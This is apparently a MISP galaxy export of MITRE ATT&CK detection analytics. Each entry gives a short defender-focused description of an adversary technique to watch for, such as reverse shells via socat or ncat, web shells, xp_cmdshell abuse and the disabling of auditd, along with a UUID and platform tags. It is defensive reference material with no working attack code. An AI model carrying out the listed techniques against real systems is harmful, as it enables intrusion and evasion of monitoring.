Outbound spoofed traffic to known amplification protocols (e.g., DNS, NTP, Memcached) combined with abnormal network traffic volume targeting remote reflectors, resulting in disproportionate traffic returned to a victim

Internal MISP references

UUID fdf11d76-3bd7-41c4-b117-7b0f17b31b17 which can be used as unique global reference for Analytic 1140 - AN1140 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1140
mitre_platforms ['Windows']

Analytic 1051 - AN1051

Detection of anomalous or unauthorized mailbox delegation activity (e.g., Add-MailboxPermission, Default/Anonymous mailbox permissions, Gmail delegation setup).

Internal MISP references

UUID 25bd8222-a9c0-4771-8250-7d6ce7b2d176 which can be used as unique global reference for Analytic 1051 - AN1051 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1051
mitre_platforms ['Office Suite']

Analytic 1501 - AN1501

Detects adversary abuse of Transactional NTFS (TxF) and undocumented process loading mechanisms (e.g., NtCreateProcessEx) to create a hollowed process from an uncommitted, maliciously tainted file image in memory, later executed via NtCreateThreadEx.

Internal MISP references

UUID 37d6450b-6c90-48dd-b69d-161099913851 which can be used as unique global reference for Analytic 1501 - AN1501 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1501
mitre_platforms ['Windows']

Analytic 1510 - AN1510

Use of ESXi web interface plugins or vSphere extensions to embed persistent malicious scripts or services.

Internal MISP references

UUID 55b8622a-795b-41d8-9b11-5576a0fb8f0f which can be used as unique global reference for Analytic 1510 - AN1510 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1510
mitre_platforms ['ESXi']

Analytic 0151 - AN0151

Outlook or Word used to forward suspicious internal attachments with macro content. Defender observes attachment forwarding, auto-opening behaviors, or macro prompt interactions.

Internal MISP references

UUID 5e3f407f-192b-4e6f-aab0-e0682da3a4a9 which can be used as unique global reference for Analytic 0151 - AN0151 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0151
mitre_platforms ['Office Suite']

Analytic 0115 - AN0115

Detects deletion of launch agents (~/Library/LaunchAgents/) and launch daemons (/Library/LaunchDaemons/), especially after suspicious process execution or when tied to known persistence methods.

Internal MISP references

UUID 81d64cae-ddd2-4512-9c8a-9a574b968c52 which can be used as unique global reference for Analytic 0115 - AN0115 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0115
mitre_platforms ['macOS']

Analytic 1150 - AN1150

Monitor unified logs for manipulation of proxy configurations, DNS resolution, or filtering rules. Adversaries may redirect responses or use trusted domains that later resolve to malicious C2 infrastructure.

Internal MISP references

UUID 9cf6c89d-73f7-42f8-b5e4-c87bf3abbb7d which can be used as unique global reference for Analytic 1150 - AN1150 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1150
mitre_platforms ['macOS']

Analytic 1015 - AN1015

Execution of utilities (e.g., ping, tracert, Test-NetConnection) or scripted methods to test Internet connectivity by interacting with external IPs/domains.

Internal MISP references

UUID aa2dc7aa-0cc5-4a75-96b2-8c089c46944b which can be used as unique global reference for Analytic 1015 - AN1015 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1015
mitre_platforms ['Windows']

Analytic 1105 - AN1105

Multiple AWS CloudTrail events indicating temporary privilege escalation via PassRole and AssumeRole targeting newly created services or non-interactive infrastructure.

Internal MISP references

UUID adfcc782-0285-43ef-af18-127dd60d1dff which can be used as unique global reference for Analytic 1105 - AN1105 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1105
mitre_platforms ['IaaS']

Analytic 0511 - AN0511

Creation or modification of stored procedures invoking xp_cmdshell or CLR assemblies for command execution and persistence.

Internal MISP references

UUID f9fb1a46-02f0-4d89-a3d9-6bed04bd47be which can be used as unique global reference for Analytic 0511 - AN0511 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0511
mitre_platforms ['Windows']

Analytic 1061 - AN1061

Unauthorized or anomalous loading of kernel-mode drivers or DLLs, concealed services, or abnormal modification of boot components indicative of rootkit activity.

Internal MISP references

UUID 03f2259d-45c2-4422-83ad-58955f89350c which can be used as unique global reference for Analytic 1061 - AN1061 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1061
mitre_platforms ['Windows']

Analytic 1106 - AN1106

Token creation or access delegation where a user impersonates a higher-privileged service account or performs domain-wide delegation actions, such as GCP's serviceAccountTokenCreator or Workspace impersonation.

Internal MISP references

UUID 23b9a5cd-9c49-48d8-9d0d-71e35ad78337 which can be used as unique global reference for Analytic 1106 - AN1106 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1106
mitre_platforms ['Identity Provider']

Analytic 1610 - AN1610

Abuse of JamPlus.exe to launch malicious payloads via crafted .jam files, resulting in abnormal process creation, command execution, or artifact generation outside of standard development workflows.

Internal MISP references

UUID 3a5eea3b-b447-47c5-832d-6ced137b1597 which can be used as unique global reference for Analytic 1610 - AN1610 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1610
mitre_platforms ['Windows']

Analytic 1160 - AN1160

Programmatic or excessive access to file shares, SharePoint, or database repositories by users not typically interacting with them. This includes abnormal access by privileged accounts, enumeration of large numbers of files, or downloads of sensitive content in bursts.

Internal MISP references

UUID 7dce56f3-43db-4787-ae13-bd2ce6851088 which can be used as unique global reference for Analytic 1160 - AN1160 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1160
mitre_platforms ['Windows']

Analytic 0161 - AN0161

Detection of a process or script that accesses a common web service to retrieve content containing obfuscated indicators of a secondary C2 server (dead drop resolver behavior).

Internal MISP references

UUID aae03a6c-b308-49cb-bb85-7be4a5c2a4bb which can be used as unique global reference for Analytic 0161 - AN0161 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0161
mitre_platforms ['ESXi']

Analytic 1016 - AN1016

Execution of ping, traceroute, or curl/wget against public IPs/domains to verify Internet reachability.

Internal MISP references

UUID bdba541c-3a01-4a6d-95ae-15e283f2909b which can be used as unique global reference for Analytic 1016 - AN1016 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1016
mitre_platforms ['Linux']

Analytic 0116 - AN0116

Detects adversary removal of persistence implants (e.g., rc.local entries or crontab injections) via CLI (rm, sed, crontab -r) and deletion of startup or management scripts.

Internal MISP references

UUID c6ae166f-f2ac-405a-85c2-b7f9349a1b99 which can be used as unique global reference for Analytic 0116 - AN0116 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0116
mitre_platforms ['ESXi']

Analytic 1601 - AN1601

Process using URLSession or similar API to fetch from web services without any response handling, indicative of one-way C2 channels.

Internal MISP references

UUID d49f06ba-7a81-440b-bc16-c583ba918a3d which can be used as unique global reference for Analytic 1601 - AN1601 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1601
mitre_platforms ['macOS']

Analytic 0611 - AN0611

Abuse of DYLD_INSERT_LIBRARIES or hijacking framework paths for malicious libraries. Defender observes processes invoking abnormal dylibs, modified plist files, or persistence entries pointing to altered binaries.

Internal MISP references

UUID e8fc16bf-6654-4912-96c9-208e4c5bbaa6 which can be used as unique global reference for Analytic 0611 - AN0611 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0611
mitre_platforms ['macOS']

Analytic 1017 - AN1017

Execution of ping, traceroute, or network utility tools to external destinations; may include scutil or system_profiler.

Internal MISP references

UUID 1443f662-d249-4458-b8fe-2c2da7b64569 which can be used as unique global reference for Analytic 1017 - AN1017 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1017
mitre_platforms ['macOS']

Analytic 1170 - AN1170

Detects usage of FTP, SCP, or TFTP by non-interactive shells or automation scripts transferring large data volumes to untrusted IPs.

Internal MISP references

UUID 170e84e2-fa22-4e8c-b2f3-3cafc0d96d7e which can be used as unique global reference for Analytic 1170 - AN1170 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1170
mitre_platforms ['Linux']

Analytic 1107 - AN1107

Detection of ApplicationImpersonation role assignment or delegated mailbox access to service principals or rarely used users, especially outside of normal hours or geographic norms.

Internal MISP references

UUID 2ec84f0f-1148-4821-acf0-a5527381865f which can be used as unique global reference for Analytic 1107 - AN1107 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1107
mitre_platforms ['Office Suite']

Analytic 0171 - AN0171

Disabling or modifying the Linux Audit system through process termination (auditd killed), service management (systemctl stop auditd), or tampering with rule/configuration files (/etc/audit/audit.rules, audit.conf). Defender view: suspicious execution of auditctl/systemctl commands, file modifications to audit rules, or sudden absence of audit logs correlated with privileged execution.

Internal MISP references

UUID 3e9734aa-b9b4-4716-927c-27c2c2aa972e which can be used as unique global reference for Analytic 0171 - AN0171 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0171
mitre_platforms ['Linux']

Analytic 1071 - AN1071

Adversaries using bash scripts or tools to recursively enumerate user home directories, config files, or SSH keys.

Internal MISP references

UUID 4f5f64b3-bc1b-4573-b790-42b8adfdd609 which can be used as unique global reference for Analytic 1071 - AN1071 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1071
mitre_platforms ['Linux']

Analytic 0711 - AN0711

Unusual access to SSH agent sockets in /tmp/ or /private/tmp, process access to another user’s $SSH_AUTH_SOCK, and lateral SSH activity without corresponding login events. Defender view: correlation of socket access with anomalous network flows to internal systems.

Internal MISP references

UUID de71bbc0-66b2-41ae-a3f3-4911ac31b391 which can be used as unique global reference for Analytic 0711 - AN0711 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0711
mitre_platforms ['macOS']

Analytic 0117 - AN0117

Adversary with write access to storage modifies lifecycle policies (e.g., via PutBucketLifecycle) to schedule rapid object deletion across one or more storage buckets. This is often used to trigger impact (destruction), remove logs (defense evasion), or force extortion (ransomware).

Internal MISP references

UUID f6f90ad5-3182-4b1a-a612-51b251a8a34c which can be used as unique global reference for Analytic 0117 - AN0117 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0117
mitre_platforms ['IaaS']

Analytic 1701 - AN1701

The user is prompted for approval when an application requests device administrator permissions. Application vetting services can check for the string BIND_DEVICE_ADMIN in the application’s manifest. This indicates it can prompt the user for device administrator permissions. The user can see which applications are registered as device administrators in the device settings.

Internal MISP references

UUID 6852479f-7c3d-4c69-82b9-b5b9976e4101 which can be used as unique global reference for Analytic 1701 - AN1701 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1701
mitre_platforms ['Android']

Analytic 1710 - AN1710

System Network Connections Discovery can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.

Internal MISP references

UUID 98dfbd23-232b-410a-bb71-25ba191ff746 which can be used as unique global reference for Analytic 1710 - AN1710 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1710
mitre_platforms ['Android']

Analytic 1180 - AN1180

Monitor unified DNS logs for abnormal domain queries with low lexical similarity to known domains, repeated failed lookups, and random string structures. Cross-check with process logs to confirm unusual origins (non-browser apps).

Internal MISP references

UUID 63de336c-105c-4e8f-aefc-420a3eac32e9 which can be used as unique global reference for Analytic 1180 - AN1180 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1180
mitre_platforms ['macOS']

Analytic 1108 - AN1108

Unexpected file creation in web directories followed by web server processes (e.g., w3wp.exe) spawning command shells or script interpreters (e.g., cmd.exe, powershell.exe)

Internal MISP references

UUID 66c98f78-2848-43f4-a69d-5562f03712ec which can be used as unique global reference for Analytic 1108 - AN1108 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1108
mitre_platforms ['Windows']

Analytic 0181 - AN0181

Execution of processes using nohup or shell redirection to ignore SIGHUP and continue running after session termination. Defender perspective: correlation between commands including nohup, disowned jobs, or & suffix with continued process execution after parent terminal exit.

Internal MISP references

UUID 8d75d4b3-6748-4d1c-936c-129ee56a12a5 which can be used as unique global reference for Analytic 0181 - AN0181 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0181
mitre_platforms ['Linux']

Analytic 1081 - AN1081

Detects bash, sh, zsh, or BusyBox shell execution initiated via remote sessions, unauthorized users, or embedded within secondary script interpreters. Focus is on chained behavior: shell > suspicious commands > network discovery or persistence indicators.

Internal MISP references

UUID c5556dd5-005a-4c11-b028-240fa379d827 which can be used as unique global reference for Analytic 1081 - AN1081 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1081
mitre_platforms ['Linux']

Analytic 0811 - AN0811

Detects SaaS web login followed by dashboard or web GUI page views from unfamiliar locations, devices, or access patterns. Identifies use of sensitive reporting or configuration consoles accessed from high-risk accounts.

Internal MISP references

UUID d3e3ed48-7402-40df-a6cc-db9b560bcfd1 which can be used as unique global reference for Analytic 0811 - AN0811 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0811
mitre_platforms ['SaaS']

Analytic 0118 - AN0118

Detects abuse of verclsid.exe to execute COM objects by monitoring process creation, CLSID arguments, DLLs or scriptlet engines loaded into memory, and If the CLSID points to remote SCT/HTA content, verclsid.exe makes outbound connections.

Internal MISP references

UUID e9f451b7-1b9e-420e-983a-3442547b7180 which can be used as unique global reference for Analytic 0118 - AN0118 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0118
mitre_platforms ['Windows']

Analytic 1018 - AN1018

Execution of ping, vmkping, or curl from shell or through automation jobs/scripts to verify Internet egress.

Internal MISP references

UUID ef76221d-d5fe-4285-af27-54711e94e2b5 which can be used as unique global reference for Analytic 1018 - AN1018 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1018
mitre_platforms ['ESXi']

Analytic 1801 - AN1801

Application vetting services could look for use of the accessibility service or features that typically require root access. The user can see a list of applications that can use accessibility services in the device settings.

Internal MISP references

UUID 176d2eda-e41b-48d0-b66a-daaccb5a77cd which can be used as unique global reference for Analytic 1801 - AN1801 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1801
mitre_platforms ['Android']

Analytic 1810 - AN1810

Network service scanning can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.

Internal MISP references

UUID f420e242-1e51-4d1a-b063-b15240283e1f which can be used as unique global reference for Analytic 1810 - AN1810 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1810
mitre_platforms ['Android']

Analytic 0191 - AN0191

Phishing via Office documents containing embedded macros or links that spawn processes. Detection relies on correlating Office application logs with suspicious child process execution and outbound network connections.

Internal MISP references

UUID 46ecb875-0842-4171-bb36-9b361453a89f which can be used as unique global reference for Analytic 0191 - AN0191 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0191
mitre_platforms ['Office Suite']

Analytic 0911 - AN0911

Execution of virtualization binaries (Parallels, VMware Fusion, VirtualBox) with arguments to hide UI. File monitoring for plist modifications indicating hidden virtualization behavior. Defender perspective: tracking process lineage and file modifications in system configs.

Internal MISP references

UUID 4d76bcf2-0935-4f61-8dd9-57ee3713b840 which can be used as unique global reference for Analytic 0911 - AN0911 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0911
mitre_platforms ['macOS']

Analytic 1019 - AN1019

Detection of excessive or programmatic access to Confluence spaces or pages, particularly by privileged users, through a combination of access logs, API usage, and identity context. Correlates logon sessions, user roles, and abnormal document viewing or export behavior. Identifies burst access patterns and tools/scripts abusing the Confluence API for mass enumeration or data scraping.

Internal MISP references

UUID 62f43db8-4701-49b9-bb0e-a8fde37e5d07 which can be used as unique global reference for Analytic 1019 - AN1019 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1019
mitre_platforms ['SaaS']

Analytic 1190 - AN1190

Detects command-line tools, agents, or scripts making outbound HTTPS connections to popular web services like Discord, Slack, Dropbox, or Graph API in an unusual context.

Internal MISP references

UUID 6e053521-1d6d-493f-8cd5-34f9a5992fc7 which can be used as unique global reference for Analytic 1190 - AN1190 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1190
mitre_platforms ['Linux']

Analytic 1109 - AN1109

File creation of unauthorized script (e.g., .php, .sh) in /var/www/html followed by execution of unexpected system utilities (e.g., curl, bash, nc) by apache/nginx

Internal MISP references

UUID 9e80763b-5287-451f-b2ab-37168b159387 which can be used as unique global reference for Analytic 1109 - AN1109 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1109
mitre_platforms ['Linux']

Analytic 0119 - AN0119

Unusual process or API usage attempting to query system locale, timezone, or keyboard layout (e.g., calls to GetLocaleInfoW, GetTimeZoneInformation). Detection can be enhanced by correlating with processes not typically associated with system configuration queries, such as unknown binaries or scripts.

Internal MISP references

UUID cd4d2b49-6a27-41a7-ab20-d2a3791142bd which can be used as unique global reference for Analytic 0119 - AN0119 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0119
mitre_platforms ['Windows']

Analytic 1091 - AN1091

Detects anomalous ARP traffic or cache modifications on Windows endpoints that indicate ARP poisoning. Behavioral focus is on multiple IP addresses resolving to a single MAC, or unsolicited ARP replies from unauthorized devices.

Internal MISP references

UUID dc4a80e3-7670-474f-aaf6-c051d5dda83c which can be used as unique global reference for Analytic 1091 - AN1091 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1091
mitre_platforms ['Windows']

Analytic 2012 - AN2012

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID 40c8a3ac-4fe9-49c3-a9bd-f8f684d42003 which can be used as unique global reference for Analytic 2012 - AN2012 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2012
mitre_platforms ['PRE']

Analytic 0122 - AN0122

Detection of queries to instance metadata services (e.g., AWS IMDS, Azure Metadata Service) for availability zone, region, or network geolocation details. Correlation with non-management accounts or non-standard workloads may indicate adversary reconnaissance.

Internal MISP references

UUID 5b41efa6-7410-403b-ac07-89e262fa17ca which can be used as unique global reference for Analytic 0122 - AN0122 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0122
mitre_platforms ['IaaS']

Analytic 1220 - AN1220

Execution of SyncAppvPublishingServer.vbs through wscript.exe with a command-line containing embedded PowerShell, proxying malicious PowerShell execution through a Microsoft-signed VBScript interpreter to evade detection and restrictions.

Internal MISP references

UUID a59042de-ecac-45bf-a852-af3df41b86d8 which can be used as unique global reference for Analytic 1220 - AN1220 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1220
mitre_platforms ['Windows']

Analytic 1022 - AN1022

LaunchAgents or LaunchDaemons initiate persistent Tor or relay processes that make encrypted outbound connections. May be paired with sandbox bypasses or unsigned executables communicating over SOCKS proxies.

Internal MISP references

UUID b97a1c6e-bb02-4e14-ae57-6a9e96512657 which can be used as unique global reference for Analytic 1022 - AN1022 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1022
mitre_platforms ['macOS']

Analytic 1202 - AN1202

Monitor email message traces and headers for failed SPF, DKIM, or DMARC checks indicating spoofed sender identities. Correlate abnormal sender domains or mismatched return-paths with elevated spoofing likelihood.

Internal MISP references

UUID c0055eb3-5579-48a8-b9d3-df6dd67bc388 which can be used as unique global reference for Analytic 1202 - AN1202 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1202
mitre_platforms ['Windows']

Analytic 0212 - AN0212

Execution of file transfer or network access activity through non-primary interfaces (e.g., WiFi, Bluetooth, cellular) by processes not typically associated with such behavior (e.g., rundll32, powershell, regsvr32).

Internal MISP references

UUID cf404364-1397-4f0f-9c21-cd534880722a which can be used as unique global reference for Analytic 0212 - AN0212 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0212
mitre_platforms ['Windows']

Analytic 0221 - AN0221

Adversary targets macOS-hosted public services (e.g., nginx, node). Chain: suspicious inbound request → service crash/5xx → service spawns shell or writes file → new outbound connection.

Internal MISP references

UUID ddab6d30-7e37-462e-b183-39c7ceb2b986 which can be used as unique global reference for Analytic 0221 - AN0221 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0221
mitre_platforms ['macOS']

Analytic 2021 - AN2021

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID e1f67192-803a-4cd3-a455-64bb623263d6 which can be used as unique global reference for Analytic 2021 - AN2021 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2021
mitre_platforms ['PRE']

Analytic 1023 - AN1023

Outbound encrypted traffic initiated from hypervisor shell or via VM backdoor mechanisms to relays in VPS infrastructure, especially if traversing multiple nodes before reaching Internet destination. Packet captures or firewall logs show non-VM communication paths.

Internal MISP references

UUID 08370ff8-9442-42c0-bfb5-c7f5792c74ea which can be used as unique global reference for Analytic 1023 - AN1023 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1023
mitre_platforms ['ESXi']

Analytic 0312 - AN0312

Detection of changes or execution of shell initialization scripts like .bashrc, .profile, or /etc/profile for persistence.

Internal MISP references

UUID 0f8a0af6-7544-4f29-8e08-6b07dda1337e which can be used as unique global reference for Analytic 0312 - AN0312 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0312
mitre_platforms ['Linux']

Analytic 1203 - AN1203

Detects spoofed emails by analyzing mail server logs (e.g., Postfix, Sendmail) for mismatched header fields, failed SPF/DKIM checks, and anomalies in SMTP proxy logs. Defender observes discrepancies between sending domain, return-path domain, and message metadata.

Internal MISP references

UUID 38300670-8c96-4f80-bc1b-d69242023a20 which can be used as unique global reference for Analytic 1203 - AN1203 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1203
mitre_platforms ['Linux']

Analytic 0132 - AN0132

Monitors programmatic access to user mailboxes in cloud-based email systems (e.g., O365, Exchange Online) using APIs or tokens. Focuses on OAuth misuse, suspicious MailItemsAccessed patterns, scripted keyword searches, and connections from untrusted agents or locations.

Internal MISP references

UUID 3af413c2-5b26-4f43-b198-11b4dce97a0a which can be used as unique global reference for Analytic 0132 - AN0132 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0132
mitre_platforms ['Office Suite']

Analytic 1320 - AN1320

Detects unauthorized modifications to login-facing web server files (e.g., index.php, login.js) typically tied to VPN, SSO, or intranet portals. Correlates suspicious file changes with remote access artifacts or web shell behavior.

Internal MISP references

UUID 5233d621-6658-4338-b183-01bd73e52861 which can be used as unique global reference for Analytic 1320 - AN1320 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1320
mitre_platforms ['Linux']

Analytic 0213 - AN0213

Use of rfkill, nmcli, or low-level tools (e.g., iw, hcitool, pppd) to enable alternate interfaces followed by data transfer via non-primary NICs.

Internal MISP references

UUID 5b9f2d26-e84c-49a3-8586-a7367580b802 which can be used as unique global reference for Analytic 0213 - AN0213 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0213
mitre_platforms ['Linux']

Analytic 0231 - AN0231

Modification of user desktop backgrounds, login screen messages, or system banners by adversaries using admin privileges or script execution. May coincide with tampering in /Library/Desktop Pictures/ or use of AppleScript.

Internal MISP references

UUID 83d3222d-6a35-401d-95b5-a09f0eac2201 which can be used as unique global reference for Analytic 0231 - AN0231 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0231
mitre_platforms ['macOS']

Analytic 2013 - AN2013

If infrastructure or patterns in the malicious web content related to SEO poisoning or Drive-by Target have been previously identified, internet scanning may uncover when an adversary has staged web content supporting a strategic web compromise. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on other phases of the adversary lifecycle, such as Drive-by Compromise or Exploitation for Client Execution.

Internal MISP references

UUID 86a212ef-8e7b-4c51-9e7f-492da2283294 which can be used as unique global reference for Analytic 2013 - AN2013 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2013
mitre_platforms ['PRE']

Analytic 2031 - AN2031

Detection of HTTP outbound requests with inconsistent or spoofed User-Agent headers from command-line tools (e.g., curl, wget, python requests) following interactive user shells or scheduled jobs outside of normal user session behavior.

Internal MISP references

UUID acabb18b-e2d6-4531-92bb-4165f0a16595 which can be used as unique global reference for Analytic 2031 - AN2031 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2031
mitre_platforms ['Linux']

Analytic 1230 - AN1230

User-space tools (e.g., socat, ncat, iptables, ssh) used in non-standard ways to establish reverse shells, port-forwarding, or inter-host connections. Often chained with uncommon outbound destinations or SSH tunnels.

Internal MISP references

UUID b95a3fbf-3d6c-4ead-8421-ff9c07ca4019 which can be used as unique global reference for Analytic 1230 - AN1230 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1230
mitre_platforms ['Linux']

Analytic 1302 - AN1302

Detects embedded macros or scripts added to shared documents or use of external references to execute code.

Internal MISP references

UUID bc143cf2-d6fb-4ea4-98a5-a2db81fc3f84 which can be used as unique global reference for Analytic 1302 - AN1302 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1302
mitre_platforms ['Office Suite']

Analytic 0123 - AN0123

Installation of a new browser extension followed by suspicious file writes or outbound network connections to untrusted domains by the browser process.

Internal MISP references

UUID db45c19b-d9d6-4794-8b49-ba232cca34b0 which can be used as unique global reference for Analytic 0123 - AN0123 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0123
mitre_platforms ['Windows']

Analytic 1032 - AN1032

Correlation of Registry key creation/modification events under known Run/Startup keys with new or unusual binary paths or script-based payloads. Multi-event detection includes registry modification followed by process execution from non-standard directories or abnormal parent-child process relationships.

Internal MISP references

UUID e863e865-8ecc-47ce-b736-eec54b6399d6 which can be used as unique global reference for Analytic 1032 - AN1032 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1032
mitre_platforms ['Windows']

Analytic 0321 - AN0321

Use of non-enterprise email or messaging services in Thunderbird, Evolution, or browsers leading to suspicious file downloads and subsequent execution. Defender view includes browser-initiated downloads of unexpected content and shell or interpreter processes launched post-download.

Internal MISP references

UUID eed7a6f2-496d-47c6-bdfd-1b885b58a651 which can be used as unique global reference for Analytic 0321 - AN0321 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0321
mitre_platforms ['Linux']

Analytic 0142 - AN0142

Correlate command executions involving 'sudo' with elevated effective user ID (euid=0), especially when tty_tickets is disabled or timestamp_timeout is actively abused.

Internal MISP references

UUID 0994985d-1d45-478e-9f1c-f407eb297007 which can be used as unique global reference for Analytic 0142 - AN0142 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0142
mitre_platforms ['Linux']

Analytic 1204 - AN1204

Detects suspicious inbound mail traffic where SPF/DKIM/DMARC authentication fails or where sender and return-path domains mismatch, observable in Apple Mail unified logs or MDM-controlled logging pipelines.

Internal MISP references

UUID 0c4a2cfd-a064-4f45-9c07-eb5c1044dd61 which can be used as unique global reference for Analytic 1204 - AN1204 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1204
mitre_platforms ['macOS']

Analytic 1420 - AN1420

Detects escalation via vulnerable setuid binaries or kernel modules, often chained with unusual access to /proc/kallsyms or /dev/kmem.

Internal MISP references

UUID 1327b96f-73db-4a5e-8e71-e515fc030bf3 which can be used as unique global reference for Analytic 1420 - AN1420 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1420
mitre_platforms ['Linux']

Analytic 0124 - AN0124

Installation of malicious .mobileconfig profiles or browser extension plist entries followed by abnormal browser child process activity.

Internal MISP references

UUID 41153f33-d415-4e1d-b3c8-7333b2f1915e which can be used as unique global reference for Analytic 0124 - AN0124 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0124
mitre_platforms ['macOS']

Analytic 1042 - AN1042

Execution of file or directory discovery commands (e.g., 'ls', 'find') from terminal or script-based tooling, especially outside normal user workflows.

Internal MISP references

UUID 42683860-d6df-4585-af65-31f783269f8f which can be used as unique global reference for Analytic 1042 - AN1042 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1042
mitre_platforms ['macOS']

Analytic 0214 - AN0214

AppleScript or system calls to activate WiFi/Bluetooth interfaces (networksetup, blueutil), followed by exfiltration via AirDrop, cloud sync, or network socket.

Internal MISP references

UUID 5a05483c-fb3b-4240-bf90-c1873b6bd392 which can be used as unique global reference for Analytic 0214 - AN0214 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0214
mitre_platforms ['macOS']

Analytic 1240 - AN1240

